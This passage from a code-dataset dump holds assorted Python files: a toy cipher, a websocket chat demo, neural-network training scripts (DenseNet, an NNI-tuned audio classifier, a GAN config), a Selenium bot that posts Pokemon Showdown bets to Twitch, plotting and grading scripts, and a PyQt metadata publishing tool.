plot_result()\n","sub_path":"figures/synthetic/invert_two_euler_poles.py","file_name":"invert_two_euler_poles.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81086943","text":"def cipher(target):\n result = \"\"\n for c in target:\n if target.islower():\n result += chr(219 - ord(c))\n else:\n result += c\n\n return result\n\ntarget = input(\"任意の文字列を入力してください--> \")\n\nencryption = cipher(target)\nprint(\"暗号化:\" + encryption)\n\ndecryption = cipher(encryption)\nprint(\"復号化:\" + decryption)\n","sub_path":"000-009/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89135314","text":"# -*- coding: utf-8 -*-\n\nimport uuid\nimport uvloop\nimport asyncio\nfrom roll import Roll, Response\nfrom roll.extensions import logger, simple_server, traceback\n\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n\n\nclass HTMLResponse(Response):\n\n def html(self, body):\n self.headers['Content-Type'] = 'plain/text'\n self.body = body\n\n \nclass Application(Roll):\n Response = HTMLResponse\n\n\napp = Application()\n#logger(app)\n#traceback(app)\n\n\n@app.route('/')\nasync def hello(request, response):\n response.html('Hello World !')\n\n\n@app.route('/chat', protocol=\"websocket\")\nasync def broadcast(request, ws, **params):\n wsid = str(uuid.uuid4())\n await ws.send(f'Welcome {wsid} !')\n async for message in ws:\n for (task, socket) in request.app['websockets']:\n if socket != ws:\n await socket.send('{}: {}'.format(wsid, message))\n \n\nif __name__ == '__main__':\n simple_server(app)\n","sub_path":"ws_examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497235461","text":"\"\"\"\nЛегкий способ многопараметрической сортировки\nв задаче B\n\"\"\"\n\nWORDS = [\"три\",\"четыре\", \"пять\", \"шесть\", \"два\", \"один\"]\n #[\"два\" , \"три\", \"один\", \"пять\", \"шесть\", \"четыре\"]\n\n\ndef main():\n \"\"\"\n Входная точка\n \"\"\"\n print(sorted(WORDS, key=lambda elem: (len(elem), elem)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day2/Lect6/pre_solve_b.py","file_name":"pre_solve_b.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"508352803","text":"import tensorflow as tf\nimport tensorflow.python.keras.losses as tfloss\nfrom tensorflow.keras import layers, models\nimport tensorflow_addons as tfa\n\n\nclass Densenet169:\n def __init__(self, data, modelRoute=''):\n self.x_train, self.x_valid, self.x_test, self.y_train, self.y_valid, self.y_test = data\n self.modelRoute = modelRoute\n\n def Train(self, pre_weights, activation, learning_rate, momentum, weight_decay, batch_size, epochs, nclasses, early_stop, save_model):\n\n model = tf.keras.applications.DenseNet169(weights=pre_weights, include_top=False,\n input_shape=(self.x_train.shape[1], self.x_train.shape[2], 3),\n pooling='avg')\n\n out = layers.Dense(nclasses, activation=activation)(model.output)\n\n full_model = models.Model(inputs=model.input, outputs=out)\n\n if weight_decay is None:\n opt = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum, nesterov=True)\n else:\n opt = tfa.optimizers.SGDW(weight_decay=weight_decay, learning_rate=learning_rate, 
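The cipher in `008.py` is an Atbash-style mirror over the lowercase alphabet (`ord('a') + ord('z') == 219`), but it tests `target.islower()` — the whole string — inside the per-character loop, so any input containing an uppercase letter is returned unchanged, and spaces in otherwise-lowercase input get mirrored too. A per-character variant keeps the involution property:

```python
def cipher(text):
    # mirror each lowercase letter: 'a' <-> 'z', 'b' <-> 'y', ...
    return ''.join(chr(219 - ord(c)) if c.islower() else c for c in text)

assert cipher(cipher('abc xyz')) == 'abc xyz'  # applying it twice decrypts
```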
momentum=momentum,\n nesterov=True)\n\n if nclasses == 2:\n loss = tfloss.BinaryCrossentropy(from_logits=False)\n else:\n loss = tf.keras.losses.CategoricalCrossentropy(from_logits=False)\n\n callbacks = self.SetCallbacks(early_stop, save_model)\n\n full_model.compile(optimizer=opt, loss=loss, metrics=['accuracy'])\n\n if nclasses == 2:\n class_weights = {0: len(self.y_train[self.y_train[:, 1] == 1]) / len(self.y_train),\n 1: len(self.y_train[self.y_train[:, 0] == 1]) / len(self.y_train)}\n elif nclasses == 4:\n\n N1 = len(self.y_train[self.y_train[:, 0] == 1])\n N2 = len(self.y_train[self.y_train[:, 1] == 1])\n N3 = len(self.y_train[self.y_train[:, 2] == 1])\n N4 = len(self.y_train[self.y_train[:, 3] == 1])\n NT = 1 / (1 / N1 + 1 / N2 + 1 / N3 + 1 / N4)\n\n class_weights = {0: 1 / N1 * NT,\n 1: 1 / N2 * NT,\n 2: 1 / N3 * NT,\n 3: 1 / N4 * NT, }\n\n history = full_model.fit(x=self.x_train, y=self.y_train, batch_size=batch_size, epochs=epochs, verbose=1,\n callbacks=callbacks, validation_data=(self.x_valid, self.y_valid),\n shuffle=True, class_weight=class_weights, sample_weight=None, initial_epoch=0,\n steps_per_epoch=None, validation_steps=None, validation_batch_size=None,\n validation_freq=1, max_queue_size=10, workers=1, use_multiprocessing=False)\n\n return full_model, history\n\n def SetCallbacks(self, early_stop, save_model):\n stopper = None\n mcp_save = None\n\n if early_stop:\n stopper = tf.keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.0001, patience=6, verbose=0,\n mode='auto', baseline=None, restore_best_weights=False)\n\n if save_model:\n mcp_save = tf.keras.callbacks.ModelCheckpoint(self.modelRoute + 'trained_model.h5',\n save_best_only=True, monitor='val_loss', mode='min')\n\n if (stopper is not None) and (mcp_save is not None):\n return [stopper, mcp_save]\n elif stopper is not None:\n return stopper\n elif mcp_save is not None:\n return mcp_save\n else:\n return None\n","sub_path":"src/ModelAlgorithms/Densenet169.py","file_name":"Densenet169.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612487807","text":"from tqdm import tqdm\n\nfrom src.architecture import Architecture\nfrom src.common_paths import get_tensorboard_logs_path\nfrom src.data_tools import *\nfrom src.data_tools import preprocess_data\nfrom src.tensorflow_utilities import start_tensorflow_session, get_summary_writer\n\npd.options.display.max_columns = 100\n\ndf, data_cube = preprocess_data()\n\n# Cardinalities\ncardinalities = {\"date\": 1684+1,\n \"store_nbr\": 54+1,\n \"item_nbr\": 4100+1,\n \"item_family\": 33+1,\n \"item_class\": 337+1,\n \"city\": 22+1,\n \"state\": 16+1,\n \"store_type\": 5+1,\n \"store_cluster\": 17+1,\n \"holiday_type\": 7}\n\nembedding_sizes = {\"store_nbr\": 30,\n \"item_nbr\": 100,\n \"item_family\": 5,\n \"item_class\": 10,\n \"city\": 5,\n \"state\": 5,\n \"store_type\": 3,\n \"store_cluster\": 5,\n \"national_holiday_type\": 3,\n \"holiday_type\": 3}\n\n\nnet = Architecture(n_timesteps_past=n_dates-15, n_timesteps_future=15, cardinalities=cardinalities,\n embedding_sizes=embedding_sizes, name=\"cf\")\n\nsess = start_tensorflow_session(\"0\")\nsess.run(tf.global_variables_initializer())\nsw = get_summary_writer(sess, get_tensorboard_logs_path(), \"CFavorita\", \"V2\")\n\nbatch_size=64\nc=0\n\nfor epoch in range(1000):\n # TRAIN:\n batcher = get_batcher(data_cube[:160000], batch_size)\n for _batch, params in tqdm(batcher):\n fd = {}\n for key, value in 
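The four-class branch above normalizes inverse-frequency weights by NT = 1/(1/N1 + ... + 1/N4) so the weights sum to 1. The same arithmetic generalizes to any number of one-hot classes; a compact sketch of that computation:

```python
import numpy as np

def inverse_frequency_weights(y_onehot):
    counts = y_onehot.sum(axis=0).astype(float)   # N_i per class
    nt = 1.0 / np.sum(1.0 / counts)               # harmonic normalizer
    return {i: nt / n for i, n in enumerate(counts)}

y = np.eye(4)[[0, 0, 0, 1, 1, 2, 3]]              # toy one-hot labels
print(inverse_frequency_weights(y))               # weights sum to 1.0
```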
_batch.items():\n            fd[getattr(net.placeholders, key)] = value\n\n        lsd.append(sess.run([net.losses.loss], feed_dict=fd))\n    lsd = np.mean(lsd)\n\n    s = sess.run(net.summ.scalar_dev_performance, feed_dict={net.ph.loss_dev: lsd})\n    sw.add_summary(s, c)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"418536400","text":"# # `pokemon-showdown.py`\n# Automated bot which spectates random Pokemon Showdown matches and coordinates a `twitch_chat_bot` to manage bets on the winners within a configured account/channel. \n#\n# ## Dependencies\n\n# +\nfrom selenium import webdriver\nimport time\nfrom get_names import getNames, getWinner\nfrom twitch_connect import twitch_chat_bot\n\n# start twitch_chat_bot - credentials/channel specified in `twitch_connect.py`\ntwitch_handler = twitch_chat_bot()\n\n# start webdriver, navigate to showdown and have window take fullscreen\ndriver = webdriver.Firefox()\ndriver.get(\"https://play.pokemonshowdown.com/\")\ndriver.maximize_window()\n# -\n\n# ## Main Loop\n\nwhile True:\n    \n    # refresh page\n    driver.refresh()\n    print(\"After refresh\")\n    \n    # open list of active battles\n    view_battle_button = driver.find_element_by_xpath('//*[@id=\"room-\"]/div/div[1]/div[2]/div[3]/p[1]/button')\n    view_battle_button.click()\n    driver.implicitly_wait(10)\n    print('view_battle_button 1 clicked')\n    \n    # select first active battle listed\n    refresh_button = driver.find_element_by_xpath('//*[@id=\"room-battles\"]/div/div/div/div[1]/a')\n    refresh_button.click()\n    driver.implicitly_wait(10)\n    \n    # reset battle playback to the first move\n    start_of_battle_button = driver.find_element_by_name(\"instantReplay\")\n    start_of_battle_button.click()\n    driver.implicitly_wait(10)\n    print('after wait')\n    \n    # extract player names from battle log\n    battle_log = driver.find_element_by_class_name(\"battle-log\").text\n    left_name, right_name = getNames(battle_log)\n    \n    # Post bet & options to twitch chat\n    twitch_handler.post_msg('!bet open \"Who will win?\" \"' + left_name + \", \" + right_name + '\" 1 1000 2')\n    \n    # loop until battle ends\n    battle_over, bets_open = False, True\n    while not battle_over:\n        \n        # wait twenty seconds\n        time.sleep(20)\n        \n        # bets aren't open by start of turn 3 (but this variable doesn't seem to do anything yet?)\n        battle_log = driver.find_element_by_class_name(\"battle-log\").text\n        if \"Turn 3\" in battle_log and bets_open:\n            bets_open = False\n        \n        # report winner and close bets to Twitch Channel\n        # check each end-of-battle message separately (a plain `or` chain would only ever test the first one)\n        if any(msg in battle_log for msg in (\"won the battle!\", \"This room is expired\", \"All players are inactive.\", \"Tie between\")):\n            battle_over = True\n            winner = getWinner(battle_log)\n            print(battle_log)\n            print(\"winner\")\n            print(winner)\n            twitch_handler.post_msg(\"!bet close \" + winner)\n    \n    # 10 seconds after bets close, exit battle and loop\n    time.sleep(10)\n    attempts = 0\n    while attempts < 3:\n        try:\n            close_battle_button = driver.find_element_by_name(\"closeRoom\")\n            close_battle_button.click()\n            print(\"Close button clicked\")\n            break\n        except:\n            print(\"Caught stale exception\")\n            driver.refresh()\n            attempts = attempts + 1\n\n    # return to and 
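The bot's close-room block retries a click three times around stale-element failures. That pattern can be factored into a helper that re-locates the element on every attempt; a generic sketch (the `closeRoom` lookup is the record's own, the helper itself is new):

```python
import time
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException

def retry_click(locate, attempts=3, delay=2):
    # `locate` is a zero-argument callable returning a freshly located element each try
    for _ in range(attempts):
        try:
            locate().click()
            return True
        except (NoSuchElementException, StaleElementReferenceException):
            time.sleep(delay)
    return False

# usage: retry_click(lambda: driver.find_element_by_name('closeRoom'))
```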
refresh battle list\n time.sleep(5)\n view_battle_button = driver.find_element_by_xpath('//*[@id=\"room-\"]/div/div[1]/div[2]/div[3]/p[1]/button')\n view_battle_button.click()\n print('view battle button 2 clicked')\n \n driver.implicitly_wait(10)\n refresh_button = driver.find_element_by_name(\"refresh\")\n refresh_button.click()\n print(\"Refresh button clicked\")\n driver.implicitly_wait(10)\n","sub_path":"pokemon-showdown.py","file_name":"pokemon-showdown.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176616615","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# constants\nPROBLEMS = [\"Air Cargo Problem 1\",\n \"Air Cargo Problem 2\",\n \"Air Cargo Problem 3\",\n \"Air Cargo Problem 4\"]\nSEARCHES = [\"breadth_first_search\", \n 'depth_first_graph_search', \n 'uniform_cost_search',\n 'greedy_best_first_graph_search-h_unmet_goals',\n 'greedy_best_first_graph_search-h_pg_levelsum',\n 'greedy_best_first_graph_search-h_pg_maxlevel',\n 'greedy_best_first_graph_search-h_pg_setlevel',\n 'astar_search-h_unmet_goals',\n 'astar_search-h_pg_levelsum',\n 'astar_search-h_pg_maxlevel',\n 'astar_search-h_pg_setlevel'\n ]\n\n\n# load data frame\ndf_search= pd.DataFrame()\ndf_search[\"AlgName\"]= SEARCHES\ndf_search[\"Alg\"]= [i+1 for i in range(11)]\ndf= pd.read_csv(\"Summary.csv\")\n\n\ndf_all= df.merge(df_search, left_on='Alg', right_on='Alg', how= 'outer')\ndf_all= df_all.sort_values([\"Problem\",\"Alg\"])\n\n\n#%% Nodes vs Actions\ndfs= df.sort_values(by=[\"Actions\"])\nplt.figure()\nplt.plot(dfs.Actions, dfs.NewNodes, 'o')\nplt.xlabel(\"Number of Actions\")\nplt.ylabel(\"Number of New Nodes\")\n\n\nboxplot= df.boxplot(column=[\"NewNodes\"], by=[\"Actions\"])\n\n\nsns.catplot(x=\"Actions\", y=\"NewNodes\", hue=\"Alg\", kind=\"point\", data=df)\n\n#%% Time vs Number of Actions\nplt.figure()\nplt.plot(df.Actions, df.ElapsedTime, 'o')\nplt.xlabel(\"Number of Actions\")\nplt.ylabel(\"Elapsed Time\")\n\n\nboxplot= df.boxplot(column=[\"ElapsedTime\"], by=[\"Actions\"])\n\n\nsns.catplot(x=\"Actions\", y=\"ElapsedTime\", hue=\"Alg\", kind=\"point\", data=df)\n\n#%% Length of Plans\nsns.catplot(x=\"AlgName\", y=\"PlanLength\", hue=\"Problem\", data=df_all, kind='bar')\nplt.xticks(rotation=75, fontsize= 10)\nplt.xlabel(\"Algorithm\")\nplt.ylabel(\"Plan Length\")\nax= plt.gca()\nax.set_position([0.1, 0.4, 0.8, 0.55])\n\nsns.catplot(x=\"Problem\", y=\"PlanLength\", hue=\"AlgName\", data=df_all, kind='bar')\nplt.xlabel(\"Problem\")\nplt.ylabel(\"Plan Length\")\n\n","sub_path":"Projects/2_Classical Planning/result_plotting.py","file_name":"result_plotting.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"243593476","text":"# Calcular média de aluno:\nnota_1 = float(input('Digite a primeira nota:'))\nnota_2 = float(input('Digite a segunda nota:'))\nmedia = (nota_1 + nota_2)/2\nif media >= 7:\n print(f'Aluno aprovado com nota: {media}')\nelif 5 < media < 7:\n print(f'Aluno em exame com nota: {media}')\nelse:\n print(f'Aluno reprovado com nota: {media}')\n","sub_path":"List/calculo_medias.py","file_name":"calculo_medias.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582823702","text":"import sys\nimport os\nimport argparse\nimport logging\n\nimport 
numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.keras.callbacks import TensorBoard\nfrom tensorflow.keras.utils import to_categorical, plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Dense, Flatten, Activation, Dropout, Conv2D, MaxPooling2D, UpSampling2D\nimport nni\nsys.path.insert(0, '/headless/shared/AudioNER/')\n\nimport constants as const\nfrom load_data import get_test_and_train_data\n\n\nLOG = logging.getLogger('deep_conv__for_noise2x_data_model_keras')\nTENSORBOARD_DIR = os.environ['NNI_OUTPUT_DIR']\n\n\ndef load_dataset(dataset_name, part_train):\n print('Load data...')\n X_train, Y1_train, Y2_train, X_test, Y1_test, Y2_test = get_test_and_train_data(dataset_name, part_train)\n print('%d train samples were loaded', len(X_train))\n print('%d test samples were loaded', len(X_test))\n X_train = (np.array(X_train)).reshape(len(X_train), const.HEIGHT, const.LENGTH, 1)\n X_test = (np.array(X_test)).reshape(len(X_test), const.HEIGHT, const.LENGTH, 1)\n Y1_train = to_categorical(Y1_train, const.N_CLASSES)\n Y1_test = to_categorical(Y1_test, const.N_CLASSES)\n Y2_train = to_categorical(Y2_train, const.N_SUBCLASSES)\n Y2_test = to_categorical(Y2_test, const.N_SUBCLASSES)\n return X_train, Y1_train, Y2_train, X_test, Y1_test, Y2_test\n\n\ndef build_model(hyper_params, input_shape=(const.HEIGHT, const.LENGTH, 1), num_classes=const.N_CLASSES, num_subclasses=const.N_SUBCLASSES):\n print('Building model...')\n #input layer\n visible = Input(shape=input_shape)\n conv0 = Conv2D(hyper_params['conv0_size'], kernel_size=(8, 10), use_bias=True, padding='same', activation='relu')(visible)\n\n #classification layers\n pool1 = MaxPooling2D((2, 2), padding='same')(conv0)\n conv1 = Conv2D(hyper_params['conv1_size'], kernel_size=(4, 10), use_bias=True, padding='same', activation='relu')(pool1)\n pool2 = MaxPooling2D((2, 2), padding='same')(conv1)\n conv2 = Conv2D(hyper_params['conv2_size'], kernel_size=(2, 5), use_bias=True, padding='same', activation='relu')(pool2)\n pool3 = MaxPooling2D((2, 2), padding='same')(conv2)\n conv3 = Conv2D(hyper_params['conv3_size'], kernel_size=(1, 1), use_bias=True, padding='same', activation='relu')(pool3)\n pool4 = MaxPooling2D((2, 2), padding='same')(conv3)\n\n flatten = Flatten()(pool4)\n\n classes_output = Dense(num_classes, activation='softmax')(flatten)\n\n # subclasses_output\n dense1 = Dense(hyper_params['dense_size'], activation='relu')(flatten)\n subclasses_output = Dense(num_subclasses, activation='softmax')(dense1)\n\n model = Model(inputs=visible, outputs=[classes_output, subclasses_output])\n\n # summarize layers\n print(model.summary())\n\n # plot graph\n #plot_model(model, to_file='multiple_outputs.png')\n\n if hyper_params['optimizer'] == 'Adam':\n optimizer = keras.optimizers.Adam(lr=hyper_params['learning_rate'])\n else:\n optimizer = keras.optimizers.SGD(lr=hyper_params['learning_rate'], momentum=0.9)\n\n model.compile(loss=keras.losses.categorical_crossentropy, optimizer=optimizer, metrics=[keras.metrics.categorical_accuracy])\n print(model.metrics_names)\n return model\n\n\nclass SendMetrics(keras.callbacks.Callback):\n '''\n Keras callback to send metrics to NNI framework\n '''\n def on_epoch_end(self, epoch, logs={}):\n '''\n Run on end of each epoch\n '''\n LOG.debug(logs) \n nni.report_intermediate_result(logs[\"dense_2_categorical_accuracy\"])\n\n\ndef train(args, params):\n '''\n Train model\n '''\n model = build_model(params)\n X_train, Y1_train, 
Y2_train, X_test, Y1_test, Y2_test = load_dataset(args.dataset_name, args.num_train)\n\n print('Fitting model...')\n results = model.fit(X_train, [Y1_train, Y2_train], epochs=args.epochs, verbose=1,\n validation_data=(X_test, [Y1_test, Y2_test]), callbacks=[SendMetrics(), TensorBoard(log_dir=TENSORBOARD_DIR)])\n\n _, _, _, cat_acc, subcat_acc = model.evaluate(X_test, [Y1_test, Y2_test], verbose=0)\n LOG.debug('Final result is: %d', subcat_acc)\n nni.report_final_result(subcat_acc)\n print('Final result is: %d', subcat_acc)\n\n model_id = nni.get_sequence_id()\n # serialize model to JSON\n model_json = model.to_json()\n with open(\"model-{}.json\".format(model_id), \"w\") as json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(\"model-{}.h5\".format(model_id))\n print(\"Saved model to disk\")\n\n\ndef generate_default_params():\n '''\n Generate default hyper parameters\n '''\n return {\n 'optimizer': 'Adam',\n 'learning_rate': 0.001\n }\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser()\n PARSER.add_argument(\"--dataset_name\", type=str,default='test_noised2x_data', help='Dataset name', required=False)\n PARSER.add_argument(\"--epochs\", type=int, default=400, help=\"Train epochs\", required=False)\n PARSER.add_argument(\"--num_train\", type=float, default=0.8,\n help=\"Part of train samples to be used, maximum 1\", required=False)\n\n ARGS, UNKNOWN = PARSER.parse_known_args()\n\n try:\n # get parameters from tuner\n RECEIVED_PARAMS = nni.get_next_parameter()\n LOG.debug(RECEIVED_PARAMS)\n PARAMS = generate_default_params()\n PARAMS.update(RECEIVED_PARAMS)\n # train\n train(ARGS, PARAMS)\n except Exception as e:\n LOG.exception(e)\n raise\n","sub_path":"NNI_models/deep_conv_for_noise2x_data/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343991542","text":"# -*- coding: UTF-8 -*-\n\nimport sys\nfrom scripts.index import *\nfrom scripts.metadato_pdf import *\nfrom scripts.validate_file import *\nfrom scripts.function_js import *\nfrom scripts.publish_agol import *\nfrom scripts.update_xml import *\nfrom scripts.nls import *\nimport zipfile\n\n\nclass execute(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.validateData.clicked.connect(self.validate)\n self.ui.uploadZip.clicked.connect(self.uploadData)\n self.ui.publishAgol.clicked.connect(self.publish2agol)\n self.ui.publishOpendata.clicked.connect(self.publish2opendata)\n self.ui.publishMetadata.clicked.connect(self.publish2metadata)\n self.ui.generateReport.clicked.connect(self.refreshData)\n self.msg = Messages()\n self.console = []\n\n self.datafile = None\n self.extent = None\n\n # Lectura de datos\n def readValues(self):\n self.dicc = {\n \"title\": u'%s' % self.ui.text01_title.text(),\n \"desc\": u'%s' % self.ui.text02_desc.toPlainText(),\n \"method\": u'%s' % self.ui.text03_method.toPlainText(),\n \"resp\": u'%s' % self.ui.text04_resp.text(),\n \"tags\": u'%s' % self.ui.text05_tags.text(),\n \"ubic\": u'%s' % self.ui.text06_ubic.text(),\n \"scale\": u'%s' % self.ui.text07_scale.text(),\n \"webpage\": u'%s' % self.ui.text08_webpage.text(),\n \"geocatmin\": u'%s' % self.ui.text09_geocatmin.text(),\n \"obs\": u'%s' % self.ui.text10_obs.toPlainText(),\n\n \"format\": u'%s' % self.ui.cb01_format.currentText(),\n \"situation\": u'%s' % 
self.ui.cb02_situation.currentText(),\n \"actualizacion\": u'%s' % self.ui.cb03_update.currentText(),\n \"restriccion\": u'%s' % self.ui.cb04_restr.currentText(),\n \"acceso\": u'%s' % self.ui.cb05_access.currentText(),\n \"fecha\": u'%s' % self.ui.date_edit.date().toString(\"dd / MMM / yyyy\"),\n\n \"capa\": self.ui.ch03_capa.isChecked(),\n \"wms\": self.ui.ch04_wms.isChecked(),\n \"shp\": self.ui.ch05_shp.isChecked(),\n \"kml\": self.ui.ch06_kml.isChecked(),\n \"opendata\": self.ui.ch07_opendata.isChecked(),\n \"csvxls\": self.ui.ch08_csvxls.isChecked(),\n \"other\": self.ui.ch09_other.isChecked()\n }\n\n # Validacion de datos\n def validate(self):\n self.addConsole(self.msg.initValidation)\n self.readValues()\n self.openpfile2validate()\n FichaMetadatos(self.dicc)\n\n def openpfile2validate(self):\n filetypes = \"Excel (*.xls *.xlsx);;Delimitado por comas (*.csv) ;;Shapefile (*.shp)\"\n self.datafile = str(QtGui.QFileDialog.getOpenFileName(self, \"Select file to import\", \"\", filetypes))\n self.validatefiledata(self.datafile)\n\n def validatefiledata(self, file):\n validate = readFileValidate(file)\n messages, self.extent = validate.main()\n for msg in messages:\n self.addConsole(msg)\n self.setWebMap()\n self.ui.view.reload()\n self.ui.view.show()\n\n # Adjuntar data\n def uploadData(self):\n if self.datafile != None:\n self.addConsole(\"Leyendo archivo\")\n dirname = SHPFOLDER\n self.namefile = [os.path.splitext(os.path.join(dirname, x))[0] for x in os.listdir(dirname) if\n os.path.splitext(x)[1] == \".shp\"]\n filetozip = [os.path.join(dirname, x) for x in os.listdir(dirname) if (\n os.path.splitext(os.path.join(dirname, x))[0] == self.namefile[0] or os.path.splitext(x)[1] == \".xml\") and\n os.path.splitext(x)[1] != \".zip\"]\n zp = zipfile.ZipFile(os.path.join(dirname, os.path.splitext(self.namefile[0])[0] + \".zip\"), \"w\",\n zipfile.ZIP_DEFLATED)\n [zp.write(x, os.path.basename(x)) for x in filetozip]\n self.zipfile = os.path.join(dirname, os.path.splitext(self.namefile[0])[0] + \".zip\")\n else:\n filetypes = \"Map document (*.mxd);;Map package (*.mpk);;Zip (*.zip)\"\n self.zipfile = QtGui.QFileDialog.getOpenFileName(self, \"Select file to import\", \"\", filetypes)\n self.namefile = os.path.splitext(self.zipfile)[0]\n\n # Publicar al agol\n def publish2agol(self):\n self.readValues()\n self.addConsole(\"Publicando al ArcGis Online\")\n PublishService().publishAgol(self.dicc, self.zipfile)\n\n # Publicar a Datos Abiertos\n def publish2opendata(self):\n self.addConsole(\"Compartiendo a Datos abiertos\")\n PublishService().publishOpenData()\n\n # Publicar a Metadata\n def publish2metadata(self):\n self.addConsole(\"Creando XML para Metadatos\")\n self.createXML()\n\n def setWebMap(self):\n self.addConsole(\"setWebMap\")\n code = SetJS().buildcode\n frame = self.ui.view.page().mainFrame()\n frame.evaluateJavaScript(code)\n\n def createXML(self):\n self.addConsole(\"createXML\")\n self.readValues()\n MakeMetadata(self.dicc, self.namefile, self.extent).main()\n\n # Generar reporte\n def refreshData(self):\n self.addConsole(\"refreshData\")\n self.datafile = None\n\n def addConsole(self, text):\n self.console.append(text)\n self.ui.statusValue.setText('\\n'.join(self.console))\n self.ui.statusValue.moveCursor(QtGui.QTextCursor.End)\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n window = execute()\n window.show()\n 
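# run the Qt event loop until the main window closes, then propagate its exit code\n    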
sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40997331","text":"# -*- coding: utf-8 -*-\n# python2.7\n# resolution 32x32x3\n\n\nimport os, sys\nsys.path.append(os.getcwd())\n\nimport time\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\nimport tflib as lib\nimport tflib.ops.linear\nimport tflib.ops.conv2d\nimport tflib.ops.batchnorm\nimport tflib.ops.deconv2d\nimport tflib.save_images\nimport tflib.cifar10\nimport tflib.dataloader_RAM as dataloader\nimport tflib.plot\nfrom tqdm import trange\nimport shutil\nimport functools\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--workmode',type=str,help='mode? train or generate',\n default='train',choices=['train','generate'])\nargs = parser.parse_args()\nWORKMODE = args.workmode\n\n# Download CIFAR-10 (Python version) at\n# https://www.cs.toronto.edu/~kriz/cifar.html and fill in the path to the\n# extracted files here!\nhome_dir = os.path.expanduser('~')\n# copy datasets to ~/datasets or make soft links to datasets in other places.\nDATASETS = [#name, ratio, path\n ['cifar', 1.0,home_dir + '/datasets/cifar-10-batches-py/'],\n ['mnist32', 0.0,home_dir + '/datasets/mnist32/'],\n ['fashion32', 0.0,home_dir + '/datasets/fashion_mnist32/'],\n ]\nEXP_ROOT_DIR = 'exp_output7'\nCOMMENT = 'run1'\nMODE = 'wgan-gp' # Valid options are dcgan, wgan, or wgan-gp\nARCH = 'DC' #valid options are 'DC' or 'Res'\nDDIM = 64\nGDIM = 64\nZ1DIM = 128\nLAMBDA = 5 # Gradient penalty lambda hyperparameter\nCRITIC_ITERS = 5 # How many critic iterations per generator iteration\nBATCH_SIZE = 64 # Batch size\nZ2DIM = N_SUBGEN = 10# How many sub-generators in the Generator\n# GEN_TYPE can be 'multigen' 'deligan' 'vcgan'\nGEN_TYPE = 'vcgan'\nINPLACE_COND = True\nDELTA = 3.0\n\nif GEN_TYPE == 'vcgan' and INPLACE_COND:\n Z1DIM -= N_SUBGEN\nDELIGAN_INIT_SCALE = 1.0\nITERS = 200000 # How many generator iterations to train for\nN_C,N_H,N_W = 3,32,32\nOUTPUT_DIM = int(N_C * N_H * N_W) # Number of pixels\nRELU_GP = False\nTRAIN_P_START = 2000\nTRAIN_P_PERIOD = 0 # train p every TRAIN_P_PERIOD iters. 
0 to disable training p\nLR = 1e-4\nLRLD = False #enable or disable linear decay of Gen and Dis learning rate\nPLR = 0.01\nPLRDR = 0.98 #PLR decay rate\n\nCALC_INCEPTION_SCORE = False\nSAVE_CHECKPOINT_PERIOD = 10000\nSAVE_SAMPLES_PERIOD = 10000\nPREVIEW_PERIOD = 250\n\n\ndef datasets_to_str(ds):\n ds_str = ''\n for name,p,path in ds:\n if p != 0.0 and p < 1.0:\n ds_str += '-{}{}'.format(p,name)\n if p != 0.0 and p == 1.0:\n ds_str += '-{}'.format(name)\n return ds_str\n\n\nEXPERIMENT_NAME = MODE + '-' + ARCH + '-32x32-{}subgen'.format(N_SUBGEN) + \\\n '-{}'.format(GEN_TYPE) + '-lr{}'.format(LR) + ('d' if LRLD else '') +\\\n ('-rgp' if RELU_GP else '') + \\\n ('-dlis{}'.format(DELIGAN_INIT_SCALE) if GEN_TYPE == 'deligan' else '') + \\\n ('-dt{}'.format(DELTA) if GEN_TYPE == 'vcgan' else '') + \\\n '-tpp{}'.format(TRAIN_P_PERIOD) + \\\n ('-plr{}-dr{}-tps{}'.format(PLR,PLRDR,TRAIN_P_START)\\\n if TRAIN_P_PERIOD > 0 else '') + \\\n datasets_to_str(DATASETS) + 